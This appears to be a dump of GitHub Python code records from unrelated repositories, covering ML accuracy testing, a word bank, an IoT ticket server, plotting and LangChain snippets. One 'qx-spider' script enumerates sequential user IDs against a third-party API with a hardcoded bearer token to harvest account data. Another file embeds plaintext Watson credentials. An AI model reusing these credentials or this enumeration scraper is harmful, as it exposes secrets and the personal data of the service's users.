labels.to(self.device)\n correct += (model(images).argmax(1) == labels).sum()\n num_samples += len(labels)\n\n if restore:\n model.train()\n\n return float(correct / num_samples) \n\n\ndef get_batch_accuracy(model: nn.Module, images: torch.Tensor, labels: torch.Tensor) -> float:\n \"\"\"\n Get accuracy for one batch of images\n\n Args:\n model (nn.Module): model\n images (torch.Tensor): images\n labels (torch.Tensor): labels\n\n Returns:\n float: _description_\n \"\"\"\n restore = model.training\n model.eval()\n with torch.no_grad():\n acc = float(torch.sum(model(images).argmax(dim=1) == labels) / len(labels))\n if restore:\n model.train()\n return acc\n\ndef get_class_accuracy(model: nn.Module, test_loader: DataLoader, device: Union[torch.device, str]=\"cuda\") -> Dict[int, float]:\n \"\"\"\n Get class-wise accuracy for a dataset\n\n Args:\n model (nn.Module): model\n test_loader (DataLoader): loader for the test set\n device (Union[torch.device, str], optional):device to run the testing on. Defaults to \"cuda\".\n\n Returns:\n Dict[int, float]: _description_\n \"\"\"\n restore = model.training\n num_correct = defaultdict(lambda : 0)\n num_samples = defaultdict(lambda : 0)\n model.eval()\n with torch.no_grad():\n for images, labels in test_loader:\n labels_unique = torch.unique(labels).tolist()\n for l in labels_unique:\n images_l = images[labels == l].to(device)\n labels_l = labels[labels == l].to(device)\n num_correct[l] += torch.sum(model(images_l).argmax(dim=1) == labels_l).item()\n num_samples[l] += len(labels_l)\n\n if restore:\n model.train()\n \n return {l: num_correct[l] / num_samples[l] for l in num_correct.keys()}","repo_name":"Ahmedjjj/Fed_distill","sub_path":"fed_distill/train/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16064823956","text":"class Account:\r\n\r\n def __init__(self,name = None,balance = 0):\r\n self.name = name\r\n self.balance = balance\r\n\r\n \r\n \r\nclass SavingsAccount(Account):\r\n\r\n def __init__(self,name,balance,intresrate):\r\n # write your code here\r\n super().__init__(name,balance)\r\n self.intrestrate = intresrate\r\n\r\n \r\na2 = SavingsAccount(\"Ashish\",5000,5)\r\nprint(a2.name)\r\nprint(a2.balance)\r\nprint(a2.intrestrate) \r\n","repo_name":"AakashShinde123/DS300123","sub_path":"Assignment_5/Challenge_4.py","file_name":"Challenge_4.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10041497006","text":"#!/usr/bin/env python\n\nimport sys\nimport json\nimport redis\nimport time\nimport signal\nimport requests\nimport configparser\n\nr: redis.Redis = None\nQX_ID_SEQ = 'qx_id_seq'\nGET_USERS_KEY = 'qx_validate_users'\ncf: configparser.ConfigParser = None\nprocess_number: str = None\n\nREQUEST_TOKEN = \"\"\"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIxMDIyNzY2MSIsImFjY2lkIjoiMTY4NTYwNzIiLCJuaWNr\\\nIjoiMTExIiwiYWNjVG9rZW4iOiJiNGJkZTNlZWNmOGFjZjc5YmRlYmY2MjZkY2YzNjcxNSIsIm5iZiI6MTU0NjU4NTUxOCwiZXhwIjoxNTQ5MDA0NzE4LCJ\\\npc3MiOiJ0aGUgbmFtZSBvZiB0aGUgaXNzdWVyIiwiYXVkIjoidGhlIG5hbWUgb2YgdGhlIGF1ZGllbmNlIn0.D8fbdlNuKMlovDbvjpOD2Sy0Ned7wgCbRM\\\n5h5vnlCnQ\"\"\"\n\n\ndef __init():\n \"\"\"系统初始化\"\"\"\n global r, cf\n cf = configparser.ConfigParser()\n cf.read(sys.argv[1])\n r = redis.Redis(host=cf.get(\"redis\", 'DB_HOST'), port=cf.get(\"redis\", \"DB_PORT\"), db=cf.getint(\"redis\", \"DB_INDEX\"),\n password=cf.get(\"redis\", 'DB_PASSWORD'), decode_responses=True)\n\n\ndef main():\n __init()\n while True:\n try:\n _, id = r.blpop(QX_ID_SEQ, 20)\n request(str(id))\n except TypeError:\n continue\n\n\ndef request(qxid: str):\n global process_number\n process_number = qxid\n try:\n res = requests.post('http://66.liuliuda668.com:8080/user/search',\n headers={'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; MIX 2 MIUI/9.1.2)',\n 'Authorization': REQUEST_TOKEN}, data={\"qxid\": \"qx\" + qxid}, timeout=3)\n\n except requests.exceptions.BaseHTTPError:\n r.lpush(QX_ID_SEQ, qxid)\n print('qxid %s net work error' % qxid)\n except requests.exceptions.ConnectTimeout:\n r.lpush(QX_ID_SEQ, qxid)\n print('qxid %s net work error' % qxid)\n except requests.exceptions.ReadTimeout:\n r.lpush(QX_ID_SEQ, qxid)\n print('qxid %s net work error' % qxid)\n else:\n if res.status_code != 200:\n print('server response code %d ' % res.status_code)\n r.lpush(QX_ID_SEQ, qxid)\n else:\n if res.json()['data']['accid']:\n print(res.json()['data'])\n r.rpush(GET_USERS_KEY, json.dumps(res.json()['data']))\n else:\n print('qxid %s is not found' % qxid)\n res.close()\n\n\ndef halt(signum, frame):\n if process_number:\n r.lpush(QX_ID_SEQ, '%s' % process_number)\n print(\"sync qx_id [%s]\" % process_number)\n print(\"Bye Bye ....\")\n sys.exit()\n\n\nsignal.signal(signal.SIGINT, halt)\nsignal.signal(signal.SIGTERM, halt)\nmain()\n","repo_name":"steven-ok/spider","sub_path":"qx-spider.py","file_name":"qx-spider.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5509204716","text":"from typing import Optional, Iterable, List, Dict, Iterable\nimport re\nimport logging\nfrom string import ascii_uppercase\nfrom functools import lru_cache\n\nfrom lemminflect import getInflection, getLemma\n\nfrom FLD_generator.word_banks.base import WordBank, POS, VerbForm, AdjForm, NounForm\nfrom nltk.corpus.reader.wordnet import Synset, Lemma\nfrom nltk.corpus import wordnet as wn\nfrom FLD_generator.utils import starts_with_vowel_sound\nfrom .base import WordNetWordBank\n\nlogger = logging.getLogger(__name__)\n\n\n@lru_cache(maxsize=1000000)\ndef _getLemma(word: str) -> str:\n # TODO: pos other than VERB\n return getLemma(word, upos='VERB')[0]\n\n\nclass EnglishWordBank(WordNetWordBank):\n\n language = 'eng'\n\n _verb_inflation_mapping = {\n VerbForm.NORMAL: 'VB',\n VerbForm.ING: 'VBG',\n VerbForm.S: 'VBZ',\n }\n\n __intermediate_constant_words = [\n f'THING-{alphabet}'\n for alphabet in ascii_uppercase\n ]\n\n def __init__(self,\n transitive_verbs: Optional[Iterable[str]] = None,\n intransitive_verbs: Optional[Iterable[str]] = None,\n vocab_restrictions: Optional[Dict[POS, Iterable[str]]] = None):\n super().__init__(vocab_restrictions=vocab_restrictions)\n\n self._transitive_verbs = set(verb.lower() for verb in transitive_verbs) if transitive_verbs is not None else None\n self._intransitive_verbs = set(verb.lower() for verb in intransitive_verbs) if intransitive_verbs is not None else None\n\n @property\n def _intermediate_constant_words(self) -> List[str]:\n return self.__intermediate_constant_words\n\n @profile\n def get_lemma(self, word: str) -> str:\n return _getLemma(word)\n\n def _change_verb_form(self, verb: str, form: VerbForm, force=False) -> List[str]:\n if form in [VerbForm.NORMAL, VerbForm.ING, VerbForm.S]:\n if verb in ['am', 'are', 'is', 'was', 'were']:\n logger.warning('Changing verb form for be-verb \"{%s}\" is subtle. Thus, we do not change it\\'s form.', verb)\n return [verb]\n else:\n verb = self.get_lemma(verb)\n\n results = getInflection(verb, tag=self._verb_inflation_mapping[form])\n\n if results is not None:\n return [results[0]]\n else:\n if form == VerbForm.NORMAL:\n # watch\n inflated_verb = verb\n elif form == VerbForm.ING:\n # [現在分詞](https://www2.kaiyodai.ac.jp/~takagi/econ/kougo82.htm)\n if re.match('.*[^aeiou]e$', verb):\n # date -> dating\n inflated_verb = verb[:-1] + 'ing'\n elif re.match('.*[^aeiou][aeiou][^aeiou]$', verb):\n # sit -> sitting\n inflated_verb = verb + verb[-1] + 'ing'\n else:\n inflated_verb = verb + 'ing'\n elif form == VerbForm.S:\n # [3単現及び名詞の複数形の -s, -es](https://www2.kaiyodai.ac.jp/~takagi/econ/kougo52.htm)\n if re.match('.*(s|sh|ch|x|o)$', verb):\n # wash -> washes\n inflated_verb = verb + 'es'\n elif re.match(r'.*[^aeiou]y$', verb):\n # study -> studies\n inflated_verb = verb[:-1] + 'ies'\n else:\n inflated_verb = verb + 's'\n else:\n raise NotImplementedError()\n return [inflated_verb]\n elif form == VerbForm.ANTI:\n antonyms = self.get_antonyms(verb)\n if len(antonyms) == 0 and force:\n raise NotImplementedError()\n return antonyms\n else:\n raise ValueError()\n\n\n def _change_adj_form(self, adj: str, form: AdjForm, force=False) -> List[str]:\n if form == AdjForm.NORMAL:\n return [adj]\n\n elif form == AdjForm.NESS:\n if adj.endswith('y'):\n # peaky -> peakiness\n ness_adj = adj[:-1] + 'iness'\n else:\n ness_adj = adj + 'ness'\n if force or ness_adj in self._cached_word_set:\n return [ness_adj]\n else:\n return []\n\n elif form == AdjForm.ANTI:\n antonyms = self.get_antonyms(adj)\n antonyms += [word for word in self._change_adj_form(adj, AdjForm.NEG)\n if word not in antonyms]\n if len(antonyms) == 0 and force:\n return self._change_adj_form(adj, AdjForm.NEG, force=True)\n return sorted(set(antonyms))\n\n elif form == AdjForm.NEG:\n negnyms = self.get_negnyms(adj)\n if len(negnyms) == 0 and force:\n return [f'non-{adj}']\n return negnyms\n\n else:\n raise ValueError(f'Unknown form {form}')\n\n def _change_noun_form(self, noun: str, form: NounForm, force=False) -> List[str]:\n if form == NounForm.NORMAL:\n return [noun]\n\n elif form == NounForm.SINGULAR:\n return [noun]\n\n elif form == NounForm.SINGULAR_WITH_PARTICLE:\n \"\"\"\n We assume that all the words are countable, thus, all the words in singular form need an indefinite particle, i.e., \"a\" or \"an\".\n This approximation is because that detecting the word countability is a challenging problem.\n See [here](https://stackoverflow.com/questions/7822922/noun-countability) for example.\n\n For detecting \"a\" vs \"an\", we borrowed implementation from https://stackoverflow.com/questions/20336524/verify-correct-use-of-a-and-an-in-english-texts-python .\n\n TODO: We might be able to detect the countability\n using existent resources like [Category:Uncountable nouns - Simple English Wiktionary](https://simple.wiktionary.org/wiki/Category:Uncountable_nouns).\n \"\"\"\n\n return [f'an {noun}' if starts_with_vowel_sound(noun) else f'a {noun}']\n\n elif form == NounForm.PLURAL:\n raise NotImplementedError()\n\n elif form == NounForm.ANTI:\n antonyms = self.get_antonyms(noun)\n antonyms += [word for word in self._change_noun_form(noun, NounForm.NEG)\n if word not in antonyms]\n if len(antonyms) == 0 and force:\n return self._change_noun_form(noun, NounForm.NEG, force=True)\n return antonyms\n\n elif form == NounForm.NEG:\n negnyms = self.get_negnyms(noun)\n if len(negnyms) == 0 and force:\n return [f'non-{noun}']\n return negnyms\n\n else:\n raise ValueError(f'Unknown form {form}')\n\n def _can_be_transitive_verb_synset(self, syn: Synset) -> bool:\n if self._can_be_intransitive_verb is None:\n raise ValueError('Set transitive verb list')\n lemma = self._get_lemma(syn)\n return lemma is not None and lemma.name().lower() in self._transitive_verbs\n\n def _can_be_intransitive_verb_synset(self, syn: Synset) -> bool:\n if self._intransitive_verbs is None:\n raise ValueError('Set intransitive verb list')\n\n lemma = self._get_lemma(syn)\n return lemma is not None and lemma.name().lower() in self._intransitive_verbs\n\n def get_negnyms(self, word) -> List[str]:\n # See [here](https://langsquare.exblog.jp/28548624/) for the following detection rules.\n negnyms = []\n negation_prefixes = ['in', 'im', 'il', 'ir', 'un', 'dis', 'non']\n negation_postfixes = ['less']\n\n for antonym in self.get_antonyms(word):\n if any([antonym == f'{prefix}{word}' for prefix in negation_prefixes])\\\n or any([antonym == f'{word}{postfix}' for postfix in negation_postfixes]):\n negnyms.append(antonym)\n\n if any((word.startswith(prefix) and word.lstrip(prefix) in self._cached_word_set\n for prefix in negation_prefixes))\\\n or any((word.endswith(postfix) and word.rstrip(postfix) in self._cached_word_set\n for postfix in negation_postfixes)):\n negnyms.append(antonym)\n return negnyms\n","repo_name":"hitachi-nlp/FLD-generator","sub_path":"FLD_generator/word_banks/wordnet/english.py","file_name":"english.py","file_ext":"py","file_size_in_byte":8362,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70500392489","text":"from parsers.common import scrape_word_data\nfrom utils.general.common import write_todo\nfrom utils.sanhedrin_finalise_lobjs_and_create_nexus.tools import is_it_the_same_meaning, q, show1, \\\n user_validate_translations, compare_lobj_id_root\nfrom utils.postprocessing.common import finalise_lemma_objects\nfrom utils.scraping.common import check_rescraped_against_existing\nfrom utils.universal import color as c, get_curried_save, load_tempsave_if_exists, load_data\n\nif __name__ == '__main__':\n\n # # # # # #\n wordtype = \"ver\"\n batch = \"01\"\n target_lang = \"ENG\"\n only_run_for_this_many_lobjs = 0 # Only set to integer for testing purposes.\n # # # # # #\n\n filename = f\"{wordtype}_batch_{batch}_SRC\"\n stem = \"./../../output_saved/batches/\"\n input_path = f\"{stem}{filename}_original\"\n output_path = f\"{stem}{filename}\"\n tempsave_path = output_path + \"_S02_tempsave\"\n save = get_curried_save(output_path, tempsave_path)\n\n c.print_teal(\"input_path = \" + c.teal(input_path))\n c.print_teal(\"output_path = \" + c.teal(output_path))\n c.print_teal(\"tempsave_path = \" + c.teal(tempsave_path))\n\n doublechecked_src_lobjs = load_tempsave_if_exists(tempsave_path)\n cmd_history = []\n\n ready = True\n if len(doublechecked_src_lobjs):\n id_of_last_done_src_lobj = doublechecked_src_lobjs[-1][\"id\"]\n ready = False\n\n src_lobjs = load_data(input_path)\n\n if only_run_for_this_many_lobjs:\n src_lobjs = src_lobjs[:only_run_for_this_many_lobjs]\n c.print_bold(\"BUT FOR TESTING LET'S JUST SAY \" + str(len(src_lobjs)))\n\n for src_lobj_index, src_lobj in enumerate(src_lobjs):\n print(\"\")\n print(\"\")\n print(f\"{src_lobj_index + 1}/{len(src_lobjs)}\")\n\n if ready:\n user_validate_translations(src_lobj_index, src_lobj, doublechecked_src_lobjs, save, target_lang,\n cmd_history)\n else:\n if not ready and compare_lobj_id_root(src_lobj[\"id\"], id_of_last_done_src_lobj):\n print(c.green(src_lobj[\"id\"]), \"is last item from tempsave.\")\n ready = True\n else:\n print(\"Already done\")\n\n for lob in doublechecked_src_lobjs:\n if \"additionalSpellings\" in lob:\n additional_spellings = lob[\"additionalSpellings\"]\n else:\n additional_spellings = []\n\n for tra in lob[\"translations\"][target_lang]:\n if tra[0] == \"+\":\n additional_spellings.append(tra[1:])\n\n if len(additional_spellings):\n print(lob[\"id\"], c.green(\"added additionalSpellings\"), additional_spellings)\n lob[\"additionalSpellings\"] = additional_spellings\n lob[\"translations\"][target_lang] = [t for t in lob[\"translations\"][target_lang] if t[0] != \"+\"]\n\n if ready:\n print(\"\")\n print(\"Done all lobjs, so now doublechecked_src_lobjs has length\", len(doublechecked_src_lobjs))\n\n save(doublechecked_src_lobjs)\n\n print(\"Completely done.\")\n","repo_name":"chicorycolumn/WiktionaryScraper","sub_path":"utils/sanhedrin_finalise_lobjs_and_create_nexus/S02_doublecheck_trans_of_src_lobjs.py","file_name":"S02_doublecheck_trans_of_src_lobjs.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40547764804","text":"import os\nimport socket\nimport json\nimport DES\nimport base64\nfrom datetime import datetime\nimport dotenv\n\ndotenv.load_dotenv()\nHOST = '0.0.0.0'\nPORT = 8080\nIOT = 8082\n\n\nIOTKEY = base64.b64decode(os.getenv(\"IOTKEY\"))\nauthenticator_set = set()\n\n\ndef validate_ticket(data):\n data_dict = json.loads(data)\n ticket = DES.decrypt(IOTKEY[:8], base64.b64decode(data_dict[\"ticket\"]))\n ticket_dict = json.loads(ticket)\n try:\n sessionkey = base64.b64decode(ticket_dict[\"sessionkey\"])\n authenticator = json.loads(\n DES.decrypt(sessionkey[16:24], base64.b64decode(data_dict[\"authenticator\"])).decode())\n except:\n return None\n timestamp = datetime.strptime(authenticator[\"timestamp\"], '%Y-%m-%d %H:%M:%S.%f')\n lifetime = datetime.strptime(ticket_dict[\"lifetime\"], '%Y-%m-%d %H:%M:%S.%f')\n if authenticator[\"logout\"] == \"True\":\n authenticator_set.clear()\n print(\"authenticator_list:\\n\",authenticator_set)\n return \"Successfully logged out from IoT.\",\"logout\"\n if datetime.now() > lifetime:\n authenticator_set.clear()\n return \"expired\"\n if authenticator[\"username\"] != ticket_dict[\"username\"]:\n return None\n if data_dict[\"server\"] != ticket_dict[\"server\"]:\n return None\n if (authenticator[\"username\"], timestamp) in authenticator_set:\n return None\n authenticator_set.add((authenticator[\"username\"], timestamp))\n print(\"authenticator_list:\\n\",authenticator_set)\n return data_dict[\"command\"]\n\n\ndef iot_device_connect(response):\n serverAddressPort = (\"127.0.0.1\", IOT)\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.sendto(response.encode(), serverAddressPort)\n msgFromServer = s.recvfrom(1024)\n\n return msgFromServer[0]\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.bind((HOST, PORT))\n\n while True:\n bytesAddressPair = s.recvfrom(1024)\n data = bytesAddressPair[0]\n\n address = bytesAddressPair[1]\n\n response = validate_ticket(data.decode())\n if not data:\n break\n\n if response is None:\n s.sendto(b'invalid session!', address)\n elif response == \"expired\":\n s.sendto(b'expired', address)\n elif response[1] == \"logout\":\n s.sendto(response[0].encode(), address)\n else:\n s.sendto(iot_device_connect(response), address)\n","repo_name":"pjoseph3/SecureIoT","sub_path":"IoTserver.py","file_name":"IoTserver.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32192770063","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nplt.style.use('K_PAPER')\nfrom glob import glob\nimport os\nfrom scipy import stats\nfrom scipy.signal import find_peaks\nfrom ExternalFunctions import Chi2Regression\nfrom iminuit import Minuit\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nimport matplotlib as mpl\n\ndef rm(x, N):\n return np.convolve(x, np.ones(N)/N, mode='valid')\n\n\ndef func(path):\n # fnames = fnames[:5]\n\n # fnames_soma = fnames[1::2]\n fnames_trunk = glob(f'{path}/trunk?*.npy')\n fnames_trunk.sort(key=os.path.getctime)\n\n\n colors = ['darkgrey', 'dodgerblue', 'goldenrod']\n\n data = np.zeros((3,8,len(fnames_trunk)))\n\n\n for l, fname in enumerate(fnames_trunk):\n trunk = np.load(fname)[::-1]\n bin_ = []\n \n if l == 0:\n fig, ax = plt.subplots(3,1, figsize = (7,6), sharey = True, sharex = True)\n for i in range(len(trunk)):\n inds, _ = find_peaks(trunk[i], height = -30)\n # for idx in inds:\n # trunk[i][idx - 55:idx + 55] = np.mean(trunk[i][idx+55:idx+60])\n\n if i%3 == 0:\n baseline = np.mean(trunk[i][1000:2000])\n print(trunk[i].shape)\n # fig, ax = plt.subplots(1,1, figsize = (7,6))\n trunk_tmp = trunk[i][15000:70000] - baseline\n # trunk_tmp[trunk_tmp > 30] = 30\n area = np.trapz(trunk_tmp, dx = .001)\n bin_.append(area)\n # ax.plot(rm(trunk[i] - baseline, 3000), color = colors[i], lw = 2)\n # ax.plot(rm(trunk[i][15000:70000], 1), color = colors[i], lw = 2)\n # ax[i%3].plot(rm(trunk[i][:], 1), color = colors[i%3], lw = 2)\n import matplotlib as mpl\n time = np.linspace(0,100,4000)\n ax[i%3].plot(time, rm(trunk[i][14000:18000], 1), color = plt.cm.cool_r((i//3)/8), lw = 2)\n cbaxes = inset_axes(ax[0], width=\"5%\", height=\"200%\", loc = 5)\n plt.colorbar(plt.cm.ScalarMappable(norm = mpl.colors.Normalize(vmin=600, vmax=1200), cmap = 'cool_r'), orientation = 'vertical',cax=cbaxes, label = '$Length$')\n # ax.text(-0.1, 1.05, 'E', fontweight = 'bold', transform = ax.transAxes, fontsize = 20)\n # if i%3 == 2:\n # ax.legend(['No shift', 'Low', 'High'], title = '$\\Delta E_k$')\n # ax.set(xlabel = 'Time[AU]', ylabel = 'Trunk Vm minus baseline')\n # # ax.set_xticks([])\n # # ax.set_yticks([])\n # # plt.savefig('AOC_plot', dpi = 200)\n plt.savefig('FIG_4E_CB.svg', dpi = 400)\n plt.savefig('FIG_4E_CB.pdf', dpi = 400)\n plt.show()\n\n\n exit()\n\n # data[:,:,l] = np.array(bin_).reshape(8,3).T\n #\n # t_test = np.zeros((2,8))\n # residuals_arr = np.zeros((2,8,len(fnames_soma)))\n # T_large = np.zeros(2)\n # R_val = np.zeros(2)\n #\n #\n # for i in range(8):\n # for j in range(2):\n # residuals = np.diff(data[[0,j+1], i, :], axis = 0).ravel()\n # residuals_arr[j,i,:] = residuals\n # sdom = np.std(residuals, ddof = 1)/np.sqrt(len(residuals))\n # t = np.mean(residuals) / sdom\n # # print(stats.t.sf(t, len(residuals)-1))\n # t_test[j,i] = stats.t.sf(t, len(residuals)-1)\n # for i in range(2):\n # residuals = residuals_arr[i,:,:].ravel()\n # sdom = np.std(residuals, ddof = 1)/np.sqrt(len(residuals))\n # t = np.mean(residuals) / sdom\n # T_large[i] = stats.t.sf(t, len(residuals)-1)\n # R_val[0] = t\n # R_val[1] = len(residuals)-1\n # mean = np.mean(data, axis = 2)\n # eom = np.std(data, axis = 2)/np.sqrt(data.shape[2])\n # return mean, eom, t_test, residuals_arr, T_large, R_val\n\n# paths = ['./new_tt/*.npy']#,\npaths = ['./folder_trunk_test/']#,\n # './no_cluster/*.npy']\ntrunk_lenghts = np.arange(100,900,100) + 300\n\nmean, eom, t_test, residuals, T_large, R_val = func(paths[0])\n# mean_n, eom_n, t_test, residuals, T_large, R_val = func(paths[1])\n\nfig, ax = plt.subplots(1,1, figsize = (7,6))\nax.text(-0.1, 1.05, 'G', fontweight = 'bold', transform = ax.transAxes, fontsize = 20)\ndef func(x,a,b):\n return a*x + b\n\ncolors = ['darkgrey', 'dodgerblue', 'goldenrod']\n\nfor i in range(3):\n fit_chi2 = Chi2Regression(func, trunk_lenghts, mean[i,:], eom[i:])\n minuit_chi2 = Minuit(fit_chi2, a=0.0, b=0.0)\n minuit_chi2.errordef = 1.0\n minuit_chi2.migrad()\n ax.plot(trunk_lenghts, func(trunk_lenghts, *minuit_chi2.values[:]), color = colors[i])\n print(minuit_chi2.values[:])\n print(minuit_chi2.errors[:])\n print(stats.chi2.sf(minuit_chi2.fval, len(trunk_lenghts) - 2))\n\n# for i in range(3):\n # fit_chi2 = Chi2Regression(func, trunk_lenghts, mean_n[i,:], eom_n[i:])\n # minuit_chi2 = Minuit(fit_chi2, a=0.0, b=0.0)\n # minuit_chi2.errordef = 1.0\n # minuit_chi2.migrad()\n # ax.plot(trunk_lenghts, func(trunk_lenghts, *minuit_chi2.values[:]), color = colors[i], ls = '--')\n # print(minuit_chi2.values[:])\n # print(minuit_chi2.errors[:])\n\n\n\nax.errorbar(trunk_lenghts, mean[0,:], eom[0,:], ls = '', capsize = 4, color = colors[0], marker = 'D')\nax.errorbar(trunk_lenghts, mean[1,:], eom[1,:], ls = '', capsize = 4, color = colors[1], marker = 'D')\nax.errorbar(trunk_lenghts, mean[2,:], eom[2,:], ls = '', capsize = 4, color = colors[2], marker = 'D')\n\n# ax.errorbar(trunk_lenghts, mean_n[0,:], eom_n[0,:], ls = '', capsize = 4, color = colors[0], marker = 'x')\n# ax.errorbar(trunk_lenghts, mean_n[1,:], eom_n[1,:], ls = '', capsize = 4, color = colors[1], marker = 'x')\n# ax.errorbar(trunk_lenghts, mean_n[2,:], eom_n[2,:], ls = '', capsize = 4, color = colors[2], marker = 'x')\nax.legend(['No shift', 'Low shift', 'High shift'], title = '$\\Delta E_K$')\nax.set(xlabel = 'Trunk lenghts[um]', ylabel = 'AOC [AU]', title = 'AOC as function of trunklenght')\n# plt.savefig('AOC_compar', dpi = 200)\nplt.savefig('FIG_4G.svg', dpi = 400)\nplt.savefig('FIG_4G.pdf', dpi = 400)\nplt.show()\n\n\n\n\n\n\n\n\n","repo_name":"malthenielsen/Potassium_hotspots","sub_path":"fractal_neuron/trunk_test/trace_plot.py","file_name":"trace_plot.py","file_ext":"py","file_size_in_byte":6194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25616271413","text":"def replaceSymbols(string):\r\n for char in string:\r\n if char in \"~!@#$%^&()[]{},+-*|/?<>'.;:\\\"\":\r\n string = string.replace(char, ' ')\r\n return string \r\n\r\ndef counts(string):\r\n wordlist = string.split()\r\n for word in wordlist:\r\n if word in result:\r\n result[word] = result[word] + 1\r\n else:\r\n result[word] = 1\r\n\r\nfileObject = open(\"PPAP.txt\", \"r\")\r\nsong = fileObject.read()\r\nfileObject.close()\r\n\r\nresult = {}\r\ntmp = replaceSymbols(song.lower())\r\ncounts(tmp)\r\n\r\nprint(result)\r\n\r\n\r\n","repo_name":"MyDearGreatTeacher/python2022","sub_path":"教科書/Ch07/file2.py","file_name":"file2.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21729364023","text":"import json\nfrom watson_developer_cloud import ToneAnalyzerV3\nfrom sentimental import *\nimport ast\nimport pandas as pd\nfrom ss import *\n\n\n# ton analyser class that takes comments and return mood status according to it.\nclass TonAna:\n def statusfun(self):\n tone_analyzer = ToneAnalyzerV3(version='2018-08-01', username='5aab6b7d-c06c-4105-aa4e-9fd81030451c',\n password='lPH5HXLmrDdN',\n url='https://gateway.watsonplatform.net/tone-analyzer/api')\n # temp = Senti()\n # res = temp.sentiments()\n # text = res\n\n temp = TwitterClient()\n res = temp.tweetsanalyse()\n text = res\n print(\"this is about tweeter!\")\n\n tone_analysis = tone_analyzer.tone({'text': text}, 'application/json').get_result()\n output = json.dumps(tone_analysis, indent=2)\n x = ast.literal_eval(output)\n fin = x['document_tone']['tones']\n df = pd.DataFrame(fin)\n mood = df.loc[0]['tone_name']\n print(mood)\n return mood\n\n\nif __name__ == '__main__':\n obj = TonAna()\n obj.statusfun()\n","repo_name":"hardik-dadhich/Sentiment_analysis_desktopApp","sub_path":"tonanalyser.py","file_name":"tonanalyser.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25265030081","text":"import os, pymongo, time\n\ndef getConfig():\n\tfile = open('../../config.js', \"r\")\n\treadFile = file.read()\n\tfor line in readFile.splitlines():\n\t\tif 'mongodb_path' in line:\n\t\t\tmongodb_path = line.split('\\'')[3]\n\t\tif 'DB_USER' in line:\n\t\t\tDB_USER = line.split('\\'')[3]\n\t\tif 'mongodb_url' in line:\n\t\t\tmongodb_url = line.split('\\'')[3]\n\t\tif 'partition' in line:\n\t\t\tpartition = line.split('\\'')[3]\n\tfile.close()\n\treturn mongodb_path, DB_USER, mongodb_url, partition\n\nmongodb_path, DB_USER, mongodb_url, partition = getConfig()\nmongo_path = \"cd \" + mongodb_path\nmongoimport = \"mongoimport --db \" + DB_USER + \" --collection \"\nimport_condition = \" --drop --file \"\njson_path = os.path.abspath(os.path.join(os.getcwd(), \"../load\"))\njson_list = os.listdir(json_path)\njson_list.sort()\n\ndef getFileDate(csv_filename):\n\tfilenameSplit = csv_filename.split(\"_\")\n\tmade = filenameSplit[len(filenameSplit)-1]\n\treturn made.replace(\".csv\", \"\")\n\ndef getLatestDate():\n\tfor x in pymongo.MongoClient(mongodb_url)[DB_USER][partition].find({\"_id\":\"metadata\"}, { \"_id\": 0, \"latestUpdate\":1}):\n\t\tlatestUpdate = x[\"latestUpdate\"]\n\t\treturn latestUpdate\n\ndef jsonToDB():\n\n\tlatestUpdate = getLatestDate()\n\tlatestUpdate = time.strptime(latestUpdate, \"%Y-%m-%d\")\n\tfor f in json_list:\n\t\tif f.find('.json') is not -1:\n\t\t\tcollection_name = f.replace('.json', '')\n\t\t\tcollection_date = time.strptime(collection_name.split(\"_\")[1], \"%Y%m%d\")\n\t\t\tif latestUpdate <= collection_date:\t\t\t\n\t\t\t\timport_cmd = mongoimport + collection_name + import_condition + json_path + \"\\\\\" +f\n\t\t\t\tos.system(mongo_path + \" && \" + import_cmd)\n\t#print(\"Complete : json to mongoimport\")\n\njsonToDB()","repo_name":"minkky/2018-KISTI","sub_path":"2018-KISTI/public/data/jsonToDB.py","file_name":"jsonToDB.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24030298562","text":"from langchain.chat_models import ChatOpenAI\n\n# from langchain.schema import AIMessage # AIMessageは応答のメッセージの型\nfrom langchain.schema import HumanMessage, SystemMessage\n\nfrom measurer import Measurer\n\nchat = ChatOpenAI()\nchat_model_measurer = Measurer(\"chat_model\")\n\n\ndef messages_in_message_out_without_system_message():\n # AIMessage(content=\"J'aime programmer.\", additional_kwargs={})\n chat_model_measurer.start_time(\"messages_in_message_out_without_system_message\")\n result = chat(\n [\n HumanMessage(\n content=(\n \"Translate this sentence from English to Japanese: \"\n \"I love programming.\"\n ),\n ),\n ]\n )\n chat_model_measurer.end_time(\"messages_in_message_out_without_system_message\")\n\n print(result)\n print(\n (\n \"response time: \"\n f\"{chat_model_measurer.time_result('messages_in_message_out_without_system_message')}\"\n )\n )\n\n\ndef messages_in_message_out_with_system_message():\n messages = [\n SystemMessage(\n content=\"You are a helpful assistant that translates English to Japanese.\"\n ),\n HumanMessage(content=\"I love programming\"),\n ]\n\n chat_model_measurer.start_time(\"messages_in_message_out_with_system_message\")\n result = 